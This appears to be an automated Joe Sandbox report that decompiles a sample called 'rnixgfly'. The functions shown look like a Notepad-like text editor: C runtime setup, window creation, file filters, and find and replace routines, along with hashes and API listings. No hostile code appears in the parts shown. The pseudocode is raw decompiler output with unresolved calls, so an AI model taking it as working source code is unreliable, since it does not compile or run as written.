                      • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                      • API String ID: 3965342766-4088090211
                      • Opcode ID: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                      • Instruction ID: 4b1105d802719206c16219924c3284388b7f1d0651c537867ca8293f0a584477
                      • Opcode Fuzzy Hash: c20fdf0be47cd7dd985298f809fffadeaa9cccdaab9f16faed17015c80af1ec7
                      • Instruction Fuzzy Hash: 33A1E8B294021CFEDB01DB95DD85EEFBFBDEB85B44F2040A7B500E2160D6B55E809B68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E004073F2(void* __ebx) {
                      				void* __edi;
                      				void* __esi;
                      				_Unknown_base(*)()* _t7;
                      				long _t10;
                      				void* _t11;
                      				int _t12;
                      				void* _t14;
                      				void* _t15;
                      				void* _t16;
                      				void* _t18;
                      				intOrPtr _t21;
                      				long _t26;
                      				void* _t30;
                      				struct HINSTANCE__* _t35;
                      				intOrPtr* _t36;
                      				void* _t39;
                      				intOrPtr* _t41;
                      				void* _t42;
                      
                      				_t30 = __ebx;
                      				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                      				if(_t35 != 0) {
                      					 *0x415a54 = GetProcAddress(_t35, "FlsAlloc");
                      					 *0x415a58 = GetProcAddress(_t35, "FlsGetValue");
                      					 *0x415a5c = GetProcAddress(_t35, "FlsSetValue");
                      					_t7 = GetProcAddress(_t35, "FlsFree");
                      					__eflags =  *0x415a54;
                      					_t39 = TlsSetValue;
                      					 *0x415a60 = _t7;
                      					if( *0x415a54 == 0) {
                      						L6:
                      						 *0x415a58 = TlsGetValue;
                      						 *0x415a54 = E00407102;
                      						 *0x415a5c = _t39;
                      						 *0x415a60 = TlsFree;
                      					} else {
                      						__eflags =  *0x415a58;
                      						if( *0x415a58 == 0) {
                      							goto L6;
                      						} else {
                      							__eflags =  *0x415a5c;
                      							if( *0x415a5c == 0) {
                      								goto L6;
                      							} else {
                      								__eflags = _t7;
                      								if(_t7 == 0) {
                      									goto L6;
                      								}
                      							}
                      						}
                      					}
                      					_t10 = TlsAlloc();
                      					 *0x414584 = _t10;
                      					__eflags = _t10 - 0xffffffff;
                      					if(_t10 == 0xffffffff) {
                      						L15:
                      						_t11 = 0;
                      						__eflags = 0;
                      					} else {
                      						_t12 = TlsSetValue(_t10,  *0x415a58);
                      						__eflags = _t12;
                      						if(_t12 == 0) {
                      							goto L15;
                      						} else {
                      							E00406741();
                      							_t41 = __imp__EncodePointer;
                      							_t14 =  *_t41( *0x415a54);
                      							 *0x415a54 = _t14;
                      							_t15 =  *_t41( *0x415a58);
                      							 *0x415a58 = _t15;
                      							_t16 =  *_t41( *0x415a5c);
                      							 *0x415a5c = _t16;
                      							 *0x415a60 =  *_t41( *0x415a60);
                      							_t18 = E0040A1DD();
                      							__eflags = _t18;
                      							if(_t18 == 0) {
                      								L14:
                      								E0040713F();
                      								goto L15;
                      							} else {
                      								_t36 = __imp__DecodePointer;
                      								_t21 =  *((intOrPtr*)( *_t36()))( *0x415a54, E004072C3);
                      								 *0x414580 = _t21;
                      								__eflags = _t21 - 0xffffffff;
                      								if(_t21 == 0xffffffff) {
                      									goto L14;
                      								} else {
                      									_t42 = E00408C3F(1, 0x214);
                      									__eflags = _t42;
                      									if(_t42 == 0) {
                      										goto L14;
                      									} else {
                      										__eflags =  *((intOrPtr*)( *_t36()))( *0x415a5c,  *0x414580, _t42);
                      										if(__eflags == 0) {
                      											goto L14;
                      										} else {
                      											_push(0);
                      											_push(_t42);
                      											E0040717C(_t30, _t36, _t42, __eflags);
                      											_t26 = GetCurrentThreadId();
                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                      											 *_t42 = _t26;
                      											_t11 = 1;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      					return _t11;
                      				} else {
                      					E0040713F();
                      					return 0;
                      				}
                      			}





















                      0x004073f2
                      0x00407400
                      0x00407404
                      0x00407424
                      0x00407431
                      0x0040743e
                      0x00407443
                      0x00407445
                      0x0040744c
                      0x00407452
                      0x00407457
                      0x0040746f
                      0x00407474
                      0x0040747e
                      0x00407488
                      0x0040748e
                      0x00407459
                      0x00407459
                      0x00407460
                      0x00000000
                      0x00407462
                      0x00407462
                      0x00407469
                      0x00000000
                      0x0040746b
                      0x0040746b
                      0x0040746d
                      0x00000000
                      0x00000000
                      0x0040746d
                      0x00407469
                      0x00407460
                      0x00407493
                      0x00407499
                      0x0040749e
                      0x004074a1
                      0x00407568
                      0x00407568
                      0x00407568
                      0x004074a7
                      0x004074ae
                      0x004074b0
                      0x004074b2
                      0x00000000
                      0x004074b8
                      0x004074b8
                      0x004074c3
                      0x004074c9
                      0x004074d1
                      0x004074d6
                      0x004074de
                      0x004074e3
                      0x004074eb
                      0x004074f2
                      0x004074f7
                      0x004074fc
                      0x004074fe
                      0x00407563
                      0x00407563
                      0x00000000
                      0x00407500
                      0x00407500
                      0x00407513
                      0x00407515
                      0x0040751a
                      0x0040751d
                      0x00000000
                      0x0040751f
                      0x0040752b
                      0x0040752f
                      0x00407531
                      0x00000000
                      0x00407533
                      0x00407544
                      0x00407546
                      0x00000000
                      0x00407548
                      0x00407548
                      0x0040754a
                      0x0040754b
                      0x00407552
                      0x00407558
                      0x0040755c
                      0x00407560
                      0x00407560
                      0x00407546
                      0x00407531
                      0x0040751d
                      0x004074fe
                      0x004074b2
                      0x0040756c
                      0x00407406
                      0x00407406
                      0x0040740e
                      0x0040740e

                      APIs
                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004032DD), ref: 004073FA
                      • __mtterm.LIBCMT ref: 00407406
                        • Part of subcall function 0040713F: DecodePointer.KERNEL32(0000000A,00407568,?,004032DD), ref: 00407150
                        • Part of subcall function 0040713F: TlsFree.KERNEL32(00000025,00407568,?,004032DD), ref: 0040716A
                        • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000000,00000000,77D2F3A0,?,00407568,?,004032DD), ref: 0040A244
                        • Part of subcall function 0040713F: _free.LIBCMT ref: 0040A247
                        • Part of subcall function 0040713F: DeleteCriticalSection.KERNEL32(00000025,77D2F3A0,?,00407568,?,004032DD), ref: 0040A26E
                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040741C
                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00407429
                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00407436
                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00407443
                      • TlsAlloc.KERNEL32(?,004032DD), ref: 00407493
                      • TlsSetValue.KERNEL32(00000000,?,004032DD), ref: 004074AE
                      • __init_pointers.LIBCMT ref: 004074B8
                      • EncodePointer.KERNEL32(?,004032DD), ref: 004074C9
                      • EncodePointer.KERNEL32(?,004032DD), ref: 004074D6
                      • EncodePointer.KERNEL32(?,004032DD), ref: 004074E3
                      • EncodePointer.KERNEL32(?,004032DD), ref: 004074F0
                      • DecodePointer.KERNEL32(004072C3,?,004032DD), ref: 00407511
                      • __calloc_crt.LIBCMT ref: 00407526
                      • DecodePointer.KERNEL32(00000000,?,004032DD), ref: 00407540
                      • GetCurrentThreadId.KERNEL32 ref: 00407552
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                      • API String ID: 3698121176-3819984048
                      • Opcode ID: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                      • Instruction ID: abc2b01e53dd726ea6ca3b762da50172eabd6a4d95284a08a9d923f29f314dbe
                      • Opcode Fuzzy Hash: 5dfacebdbd241fa9c02f50907a1fe7b60bed9190aaf6ba437ccb18094116dc8a
                      • Instruction Fuzzy Hash: CA315031D94651EAC711AB75FC88ACA3FA5AF847A0B10863BE500A76F0DB789481CB5D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 86%
                      			E0040232A(signed int __edx, struct HWND__* _a4, int _a8, void* _a12, unsigned int _a16) {
                      				struct tagRECT _v20;
                      				short _v540;
                      				void* __ebx;
                      				void* __edi;
                      				signed int _t36;
                      				signed int _t38;
                      				long _t40;
                      				signed int _t41;
                      				signed int _t43;
                      				signed int _t50;
                      				int _t54;
                      				signed int _t60;
                      				signed int _t62;
                      				signed int _t68;
                      				signed int _t70;
                      				void* _t82;
                      				int _t83;
                      				signed int _t85;
                      				signed int _t87;
                      				signed int _t89;
                      				long _t94;
                      				void* _t112;
                      				void* _t113;
                      
                      				_t36 =  *0x4151c0 & 0x0000ffff;
                      				_t83 = _a8;
                      				_t113 = _t112 - 0x218;
                      				if(_t83 != _t36) {
                      					__eflags = _t83 - 0x11;
                      					if(__eflags > 0) {
                      						_t38 = _t83 - 0x111;
                      						__eflags = _t38;
                      						if(_t38 == 0) {
                      							E004021A1(_a12 & 0x0000ffff);
                      							L34:
                      							_t40 = 0;
                      							L35:
                      							return _t40;
                      						}
                      						_t41 = _t38 - 6;
                      						__eflags = _t41;
                      						if(_t41 == 0) {
                      							E00401B9F(_a12);
                      							goto L34;
                      						}
                      						_t43 = _t41 - 0x11c;
                      						__eflags = _t43;
                      						if(_t43 == 0) {
                      							DragQueryFileW(_a12, 0,  &_v540, 0x41);
                      							DragFinish(_a12);
                      							0x400000( &_v540, 0xffffffff);
                      							goto L34;
                      						}
                      						__eflags = _t43 == 0xd4;
                      						if(_t43 == 0xd4) {
                      							goto L34;
                      						}
                      						L30:
                      						_t40 = DefWindowProcW(_a4, _t83, _a12, _a16);
                      						goto L35;
                      					}
                      					if(__eflags == 0) {
                      						0x400000();
                      						__eflags = _t36;
                      						if(_t36 == 0) {
                      							goto L34;
                      						}
                      						_t40 = 1;
                      						goto L35;
                      					}
                      					_t50 = _t83 - 1;
                      					__eflags = _t50;
                      					if(_t50 == 0) {
                      						_t94 = 0x50a00144;
                      						GetClientRect(_a4,  &_v20);
                      						__eflags =  *0x415fdc; // 0x0
                      						if(__eflags == 0) {
                      							_t94 = 0x50b001c4;
                      						}
                      						 *0x415f6c = CreateWindowExW(0x200, L"edit", 0, _t94, 0, 0, _v20.right, _v20.bottom, _a4, 0,  *0x415f60, 0);
                      						_t54 = CreateFontIndirectW(0x415f80);
                      						 *0x415f70 = _t54;
                      						SendMessageW( *0x415f6c, 0x30, _t54, 0);
                      						SendMessageW( *0x415f6c, 0xc5, 0, 0);
                      						 *0x415f74 = CreateWindowExW(0, 0x6e, 0, 0x50000000, 0, 0, 0, 0, _a4, 0,  *0x415f60, 0);
                      						LoadStringW( *0x415f60, 0x206, 0x415f7c, 0);
                      						 *0x4170f4 =  *0x4170f4 | 0xffffffff;
                      						 *0x4170f8 =  *0x4170f8 | 0xffffffff;
                      						E004010B6();
                      						goto L34;
                      					}
                      					_t60 = _t50 - 1;
                      					__eflags = _t60;
                      					if(_t60 == 0) {
                      						E004011CB(__edx);
                      						PostQuitMessage(0);
                      						goto L34;
                      					}
                      					_t62 = _t60 - 3;
                      					__eflags = _t62;
                      					if(_t62 == 0) {
                      						E00401170(_a16 & 0x0000ffff, _a16 >> 0x10);
                      						goto L34;
                      					}
                      					_t68 = _t62;
                      					__eflags = _t68;
                      					if(_t68 == 0) {
                      						SetFocus( *0x415f6c);
                      						goto L34;
                      					}
                      					_t70 = _t68 - 9;
                      					__eflags = _t70;
                      					if(_t70 != 0) {
                      						goto L30;
                      					}
                      					0x400000();
                      					__eflags = _t70;
                      					if(_t70 != 0) {
                      						DestroyWindow(_a4);
                      					}
                      					goto L34;
                      				}
                      				_t82 = _a16;
                      				if(( *(_t82 + 0xc) & 0x00000040) != 0) {
                      					 *0x415f68 =  *0x415f68 & 0x00000000;
                      				}
                      				if(( *(_t82 + 0xc) & 0x00000008) != 0) {
                      					_t89 = 0xa;
                      					memcpy(0x417124, _t82, _t89 << 2);
                      					_t113 = _t113 + 0xc;
                      					E00401C3A(_t82);
                      				}
                      				if(( *(_t82 + 0xc) & 0x00000010) != 0) {
                      					_t87 = 0xa;
                      					memcpy(0x417124, _t82, _t87 << 2);
                      					_t113 = _t113 + 0xc;
                      					E00401D4C(_t82);
                      				}
                      				if(( *(_t82 + 0xc) & 0x00000020) != 0) {
                      					_t85 = 0xa;
                      					memcpy(0x417124, _t82, _t85 << 2);
                      					E00401E09(_t82);
                      				}
                      				goto L34;
                      			}


























                      0x0040232d
                      0x00402334
                      0x00402337
                      0x00402342
                      0x004023a6
                      0x004023a9
                      0x004024fc
                      0x004024fc
                      0x00402501
                      0x00402563
                      0x00402568
                      0x00402568
                      0x0040256a
                      0x0040256e
                      0x0040256e
                      0x00402503
                      0x00402503
                      0x00402506
                      0x00402558
                      0x00000000
                      0x00402558
                      0x00402508
                      0x00402508
                      0x0040250d
                      0x00402536
                      0x0040253f
                      0x0040254e
                      0x00000000
                      0x0040254e
                      0x0040250f
                      0x00402514
                      0x00000000
                      0x00000000
                      0x00402516
                      0x00402520
                      0x00000000
                      0x00402520
                      0x004023af
                      0x004024ec
                      0x004024f1
                      0x004024f3
                      0x00000000
                      0x00000000
                      0x004024f7
                      0x00000000
                      0x004024f7
                      0x004023b7
                      0x004023b7
                      0x004023b8
                      0x0040242a
                      0x0040242f
                      0x00402437
                      0x0040243d
                      0x0040243f
                      0x0040243f
                      0x00402470
                      0x00402475
                      0x0040248b
                      0x00402490
                      0x0040249f
                      0x004024cc
                      0x004024d1
                      0x004024d7
                      0x004024de
                      0x004024e5
                      0x00000000
                      0x004024e5
                      0x004023ba
                      0x004023ba
                      0x004023bb
                      0x00402411
                      0x00402418
                      0x00000000
                      0x00402418
                      0x004023bd
                      0x004023bd
                      0x004023c0
                      0x00402407
                      0x00000000
                      0x00402407
                      0x004023c3
                      0x004023c3
                      0x004023c4
                      0x004023f0
                      0x00000000
                      0x004023f0
                      0x004023c6
                      0x004023c6
                      0x004023c9
                      0x00000000
                      0x00000000
                      0x004023cf
                      0x004023d4
                      0x004023d6
                      0x004023df
                      0x004023df
                      0x00000000
                      0x004023d6
                      0x00402344
                      0x0040234b
                      0x0040234d
                      0x0040234d
                      0x00402358
                      0x0040235c
                      0x00402365
                      0x00402365
                      0x00402367
                      0x00402367
                      0x00402370
                      0x00402374
                      0x0040237c
                      0x0040237c
                      0x00402380
                      0x00402380
                      0x00402389
                      0x00402391
                      0x0040239a
                      0x0040239c
                      0x0040239c
                      0x00000000

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: DestroyFocusWindow
                      • String ID: $qA$$qA$$qA$edit
                      • API String ID: 3487535441-3532291762
                      • Opcode ID: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                      • Instruction ID: 16f5dcc297cbe28d248b0e56e8d7a63b236712e1f54e60767082c5174542b945
                      • Opcode Fuzzy Hash: 66b6a7f4ab79553599cec14569f15df8e0990a78eb94f5a99c61f67b7d80a9f7
                      • Instruction Fuzzy Hash: 0B51C131140218BBDB219F75DE4CBEB3E68EB45394F148136FA04A61E1C7BD8941DB6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00401ABC() {
                      				signed int _t20;
                      				signed int _t25;
                      				signed int _t30;
                      				WCHAR* _t34;
                      				WCHAR* _t35;
                      				WCHAR* _t38;
                      
                      				LoadStringW( *0x415f60, 0x176, 0x416804, 0xff);
                      				_t34 = 0x416806 + lstrlenW(0x416804) * 2;
                      				lstrcpyW(_t34, L"*.txt");
                      				_t35 = _t34 + 2 + lstrlenW(_t34) * 2;
                      				LoadStringW( *0x415f60, 0x175, _t35, 0xff);
                      				_t38 = _t35 + 2 + lstrlenW(_t35) * 2;
                      				lstrcpyW(_t38, L"*.*");
                      				 *((short*)(_t38 + 2 + lstrlenW(_t38) * 2)) = 0;
                      				_t20 =  *0x415fdc; // 0x0
                      				 *0x41714c =  *0x41714c & 0;
                      				 *0x417150 =  *0x417150 & 0;
                      				asm("sbb eax, eax");
                      				CheckMenuItem(GetMenu( *0x415f64), 0x119,  ~_t20 & 0x00000008);
                      				_t25 =  *0x415f78; // 0x0
                      				asm("sbb eax, eax");
                      				CheckMenuItem(GetMenu( *0x415f64), 0x205,  ~_t25 & 0x00000008);
                      				_t30 =  *0x415f78; // 0x0
                      				asm("sbb eax, eax");
                      				return ShowWindow( *0x415f74,  ~_t30 & 0x00000005);
                      			}









                      0x00401adb
                      0x00401ae6
                      0x00401af3
                      0x00401b01
                      0x00401b11
                      0x00401b16
                      0x00401b20
                      0x00401b31
                      0x00401b36
                      0x00401b3b
                      0x00401b41
                      0x00401b49
                      0x00401b63
                      0x00401b65
                      0x00401b6c
                      0x00401b80
                      0x00401b82
                      0x00401b89
                      0x00401b9e

                      APIs
                      • LoadStringW.USER32(00000176,00416804,000000FF,00000000), ref: 00401ADB
                      • lstrlenW.KERNEL32(00416804), ref: 00401AE4
                      • lstrcpyW.KERNEL32 ref: 00401AF3
                      • lstrlenW.KERNEL32(80000000), ref: 00401AFA
                      • LoadStringW.USER32(00000175,?,000000FF), ref: 00401B11
                      • lstrlenW.KERNEL32(?), ref: 00401B14
                      • lstrcpyW.KERNEL32 ref: 00401B20
                      • lstrlenW.KERNEL32(?), ref: 00401B27
                      • GetMenu.USER32(00000119), ref: 00401B5A
                      • CheckMenuItem.USER32(00000000), ref: 00401B63
                      • GetMenu.USER32(00000205), ref: 00401B7D
                      • CheckMenuItem.USER32(00000000), ref: 00401B80
                      • ShowWindow.USER32(00000000), ref: 00401B95
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                      • String ID: *.*$*.txt
                      • API String ID: 3918228958-3257935098
                      • Opcode ID: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                      • Instruction ID: 572a540fb6504921a5b5a71d4603651758fe767a8bf175bd1912394847e7168a
                      • Opcode Fuzzy Hash: 75e06e0688ce5136c08f1be010525f00f6fa6f4c30b6f453ae9aaa2372dfe8a2
                      • Instruction Fuzzy Hash: 56118132590629BBD7016B78EC4ADEA3B7DEB88711B05C432F101E71B0D7B95881CF68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00401E09(intOrPtr _a4) {
                      				void* _v8;
                      				signed int _v12;
                      				int _v16;
                      				void* _t27;
                      				void* _t33;
                      				int _t38;
                      				void* _t44;
                      				int _t50;
                      				intOrPtr _t51;
                      
                      				_v16 = lstrlenW( *(_a4 + 0x10));
                      				SendMessageW( *0x415f6c, 0xb1, 0, 0);
                      				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                      				_t50 = _t4;
                      				_push(_t50 + _t50);
                      				_push(0);
                      				while(1) {
                      					_t27 = HeapAlloc(GetProcessHeap(), ??, ??);
                      					_v12 = _t27;
                      					if(_t27 == 0) {
                      						break;
                      					}
                      					GetWindowTextW( *0x415f6c, _v12, _t50);
                      					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                      					_t51 = _a4;
                      					_t33 = ( *(_t51 + 0xc) & 0x00000005) - 1;
                      					if(_t33 == 0) {
                      						L3:
                      						if(_v8 ==  ~_v12) {
                      							_v8 = _v8 | 0xffffffff;
                      						}
                      						HeapFree(GetProcessHeap(), 0, _v12);
                      						_t38 = _v8;
                      						if(_t38 == 0xffffffff) {
                      							return SendMessageW( *0x415f6c, 0xb1, 0, 0);
                      						}
                      						SendMessageW( *0x415f6c, 0xb1, _t38, _v16 + _t38);
                      						SendMessageW( *0x415f6c, 0xc2, 1,  *(_t51 + 0x14));
                      						_t18 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                      						_t50 = _t18;
                      						_push(_t50 + _t50);
                      						_push(0);
                      						continue;
                      					}
                      					_t44 = _t33 - 4;
                      					if(_t44 == 0) {
                      						goto L3;
                      					}
                      					return _t44;
                      				}
                      				return _t27;
                      			}












                      0x00401e33
                      0x00401e36
                      0x00401e44
                      0x00401e44
                      0x00401e4a
                      0x00401e4b
                      0x00401eee
                      0x00401ef1
                      0x00401ef7
                      0x00401efc
                      0x00000000
                      0x00000000
                      0x00401e61
                      0x00401e78
                      0x00401e7a
                      0x00401e83
                      0x00401e84
                      0x00401e8f
                      0x00401e97
                      0x00401e99
                      0x00401e99
                      0x00401ea5
                      0x00401eab
                      0x00401eb1
                      0x00000000
                      0x00401f13
                      0x00401ec5
                      0x00401ed7
                      0x00401ee5
                      0x00401ee5
                      0x00401eeb
                      0x00401eec
                      0x00000000
                      0x00401eec
                      0x00401e86
                      0x00401e89
                      0x00000000
                      0x00000000
                      0x00401f19
                      0x00401f19
                      0x00000000

                      APIs
                      • lstrlenW.KERNEL32(?), ref: 00401E18
                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401E36
                      • GetWindowTextLengthW.USER32 ref: 00401E3E
                      • GetWindowTextW.USER32 ref: 00401E61
                      • SendMessageW.USER32(000000B0,00000000,?), ref: 00401E78
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00401EA2
                      • HeapFree.KERNEL32(00000000), ref: 00401EA5
                      • SendMessageW.USER32(000000B1,?,?), ref: 00401EC5
                      • SendMessageW.USER32(000000C2,00000001,?), ref: 00401ED7
                      • GetWindowTextLengthW.USER32 ref: 00401EDF
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401EEE
                      • HeapAlloc.KERNEL32(00000000), ref: 00401EF1
                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00401F13
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: MessageSend$Heap$TextWindow$LengthProcess$AllocFreelstrlen
                      • String ID:
                      • API String ID: 1498816615-0
                      • Opcode ID: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                      • Instruction ID: ce49090e5d19a19af0320e951ed4d397d30ac25977f929a6b7e329fcc34971d6
                      • Opcode Fuzzy Hash: 48ec3bf0ab5ab7a8601c70e7cea4bf8902e51d03c3d1ad19201b7ebe05fdb5df
                      • Instruction Fuzzy Hash: 57313A31A00609FFDB119BA0EC89FEE7B79EB88314F108031F941A61B0C7B5AD559B28
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00401C3A(WCHAR* _a4) {
                      				void* _v8;
                      				int _v12;
                      				WCHAR* _v16;
                      				void* _t28;
                      				signed int _t34;
                      				WCHAR* _t42;
                      				void* _t43;
                      				void* _t44;
                      				WCHAR* _t45;
                      				void* _t48;
                      				WCHAR* _t49;
                      				signed int _t53;
                      				int _t55;
                      				WCHAR* _t56;
                      
                      				_v12 = lstrlenW(_a4[8]);
                      				_t4 = GetWindowTextLengthW( *0x415f6c) + 1; // 0x1
                      				_t55 = _t4;
                      				_t28 = HeapAlloc(GetProcessHeap(), 0, _t55 + _t55);
                      				_t48 = _t28;
                      				if(_t48 != 0) {
                      					GetWindowTextW( *0x415f6c, _t48, _t55);
                      					SendMessageW( *0x415f6c, 0xb0, 0,  &_v8);
                      					_t49 = _a4;
                      					_t34 =  *(_t49 + 0xc) & 0x00000005;
                      					if(_t34 == 0) {
                      						L5:
                      						_t56 = _a4;
                      						L6:
                      						_v8 = _t56 - _t48 >> 1;
                      						HeapFree(GetProcessHeap(), 0, _t48);
                      						if(_t56 != 0) {
                      							return SendMessageW( *0x415f6c, 0xb1, _v8, _v12 + _v8);
                      						}
                      						_t42 = _a4;
                      						0x400000( *0x415f68, 0x17b, _t42[8], 0x40);
                      						return _t42;
                      					}
                      					_t43 = _t34 - 1;
                      					if(_t43 == 0) {
                      						goto L5;
                      					}
                      					_t44 = _t43 - 3;
                      					if(_t44 == 0) {
                      						_t45 =  *(_t49 + 0x10);
                      						_t53 = _v8 - _v12;
                      						_v16 = _t45;
                      						_t18 = _t53 * 2; // -2
                      						_t56 = _t48 + _t18 - 2;
                      						lstrlenW(_t45);
                      						while(_t56 >= _t48) {
                      							if(lstrcmpW(_t56, _v16) == 0) {
                      								goto L6;
                      							}
                      							_t56 = _t56 - 2;
                      						}
                      						_t56 = 0;
                      						goto L6;
                      					}
                      					_t28 = _t44 - 1;
                      					if(_t28 == 0) {
                      						goto L5;
                      					}
                      				}
                      				return _t28;
                      			}

















                      0x00401c57
                      0x00401c60
                      0x00401c60
                      0x00401c70
                      0x00401c76
                      0x00401c7a
                      0x00401c88
                      0x00401c9f
                      0x00401ca5
                      0x00401cae
                      0x00401cb1
                      0x00401cc2
                      0x00401cc2
                      0x00401cc5
                      0x00401cce
                      0x00401cd8
                      0x00401ce0
                      0x00000000
                      0x00401d3f
                      0x00401ce2
                      0x00401cf5
                      0x00000000
                      0x00401cf5
                      0x00401cb3
                      0x00401cb4
                      0x00000000
                      0x00000000
                      0x00401cb6
                      0x00401cb9
                      0x00401cfc
                      0x00401d02
                      0x00401d06
                      0x00401d09
                      0x00401d09
                      0x00401d0d
                      0x00401d22
                      0x00401d1d
                      0x00000000
                      0x00000000
                      0x00401d1f
                      0x00401d1f
                      0x00401d26
                      0x00000000
                      0x00401d26
                      0x00401cbb
                      0x00401cbc
                      0x00000000
                      0x00000000
                      0x00401cbc
                      0x00401d49

                      APIs
                      • lstrlenW.KERNEL32(?), ref: 00401C4F
                      • GetWindowTextLengthW.USER32 ref: 00401C5A
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401C69
                      • HeapAlloc.KERNEL32(00000000), ref: 00401C70
                      • GetWindowTextW.USER32 ref: 00401C88
                      • SendMessageW.USER32(000000B0,00000000,?), ref: 00401C9F
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401CD1
                      • HeapFree.KERNEL32(00000000), ref: 00401CD8
                      • lstrlenW.KERNEL32(?), ref: 00401D0D
                      • lstrcmpW.KERNEL32(-00000002,?), ref: 00401D15
                      • SendMessageW.USER32(000000B1,?,?), ref: 00401D3F
                      Memory Dump Source
                      • Source File: 00000001.00000002.248479699.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.248453229.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248580141.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                      • Associated: 00000001.00000002.248605999.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_rnixgfly.jbxd
                      Similarity
                      • API ID: Heap$MessageProcessSendTextWindowlstrlen$AllocFreeLengthlstrcmp
                      • String ID:
                      • API String ID: 302198436-0
                      • Opcode ID: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
                      • Instruction ID: 738a3a3d88226cada9937fa8338a0d395f6bf2963d328e57f9c5620f5e592caa
                      • Opcode Fuzzy Hash: cc72cb58a21e2fb17c5fff7b8e4ed7f1f6b45f72a17095162b12c3208c8c986d
